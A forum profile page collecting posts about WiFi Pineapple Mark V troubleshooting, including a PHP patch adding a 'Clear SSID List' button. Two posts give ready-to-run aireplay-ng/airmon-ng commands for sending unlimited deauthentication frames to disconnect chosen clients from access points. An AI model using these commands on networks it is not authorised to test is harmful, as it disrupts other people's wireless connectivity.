Jump to content

pla12

Active Members
  • Posts

    22
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by pla12

  1. @Sebkinne What browser have you been testing with? This version doesn't seem to like safari or safari mobile very much. Things like tile layout and toggles don't always work like the previous version, but using a browser like iceweasel works perfectly.

    Also, How many Deauths are sent with the new option? When selecting the option, my test client gets deauth only once. Is this the expected behavior?

    And one last question, is there a way, other than the system logs,to see what clients are currently getting deauthenticated?

  2. do this

    reboot the pineapple

    use putty to ssh into and run the following commands

    - airmon-ng start wlan1

    -iwconfig wlan1 channel 1

    -aireplay-ng -0 100 -a 00:21:29:D6:AC:06 wlan1

    I use wlan1 on this command not mon0, also make sure the -a argument has the access point MAC,

    to test death on the specific PC use the -c Mac of client

    this works for me every time.

  3. Cheeto,

    Just for testing purposes, have you tried deauth from the CLI? I know the web Ui should work but trying it first from the CLI can go a long way to troubleshoot this.

    I would first try aireplay-ng, then mdk3 via the CLI. if that works then you know it's with the infusion.

    Also what channel is the AP you are trying to deauth on? and is it running a,b,g, n or ac?

    I haven't tested a windows 8 client with the latest version of deauth but I can confirm that with the blacklist fixes I'm able to deauth IOS and Mac clients

  4. Guys, let's me have a look at it and I will try to post a new version soon. Maybe the issue is in the channel hopping.

    Whistle Master, for me part of the issue seems to be with the blacklist file, Using the web UI and adding any mac addresses in the list, or selecting one from the available AP list always results in adding the following to the blacklist file

    root@Pineapple:/pineapple/components/infusions/deauth/includes/rules# cat blacklist.lst

    # Every AP

    [a-zA-Z0-9]

    Manually adding Mac addresses to the blacklist file fixed the mdk3 deauth for me. Once the mac was added, and setting the proper channel it deauth the client.

  5. Until the infusion is fix the CLI is your friend

    1- Put wlan1 in monitor mode by running

    • airmon-ng start wlan1

    2- Pick a client and its access point to deauth. Note the channel they are on and their MAC addresses

    3- Then set wlan1 to that channel by running

    • iwconfig wlan1 channel X

    4- Run "aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan1

    Where (taken from the air crack-ng site)

    • -0 means deauthentication
    • 0 is the number of deauths to send (you can send multiple if you wish, 0 means unlimited)
    • -a 00:14:6C:7E:40:80 is the MAC address of the access point
    • -c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
    • wlan1 is the interface name

    To note you can't death a client/AP that the pineapple radios don't support, also running pineap, karma or any of the other infusions that require any of the radios may interfere with the deauth by doing things like changing the channel, etc.

  6. You could do the following to add yourselves a "Clear ssid list" button... Use at your own risk! Darren and Seb probably wont want to support you if you modify the source code and break things! but nothing a restore can't fix...

    1. SSH to your pineapple,
    2. Backup the following files in case you want to revert: /pineapple/components/system/pineap/functions.php and /pineapple/components/system/pineap/tabs/pineap.php
    3. Edit the /pineapple/components/system/pineap/functions.php file with your favorite text editor (ie. vi)
    4. Find the following if condition "if (isset($_GET['pineAP_SSID'])) {"...
    5. Replace this entire condition with this new If condition.

    if (isset($_GET['pineAP_SSID'])) {

    $ssid = $_POST['ssid'];

    $pineAP = new PineAP();

    if (isset($_POST['add_ssid'])) {
    $pineAP->addSSID($ssid);
    }

    if (isset($_POST['del_ssid'])) {
    $pineAP->delSSID($ssid);
    }
    if (isset($_POST['clear_ssid'])){
    exec("rm /etc/pineapple/ssid_file");
    touch("/etc/pineapple/ssid_file");
    }
    }else {
    echo "<b></b>Unkown Command<br/>";

    }


    }

    6. Save the file

    7. Edit the /pineapple/components/system/pineap/tabs/pineap.php file with your favorite text editor

    8. Add the following code at the bottom of this file just before the "</fieldset>" on the last line.

    <form method="POST" action="/components/system/pineap/functions.php?pineAP_SSID" onsubmit="$(this).AJAXifyForm(save_pineap_settings); return false;">
    <input type='submit' name='clear_ssid' value='Clear SSID List'>
    </form>

    9. Save the file and reload the PinAP page and you will have a functional " Clear list" button below the remove ssid button.

  7. Hello,

    After my Mark V runs for 30~45 + mins, all wifi clients loose access and the Web management page is no longer allowing me to log in. This happens simply by plugging the device in and leaving it running for that period of time. After looking into this further i found that the /tmp directory is 100% full because of a file called mk-01.cap. After deleting the file, the pineapple returns to normal and allows connections until the local storage fills up again.

    Does anyone know what process or infusion is creating this capture file?

×
×
  • Create New...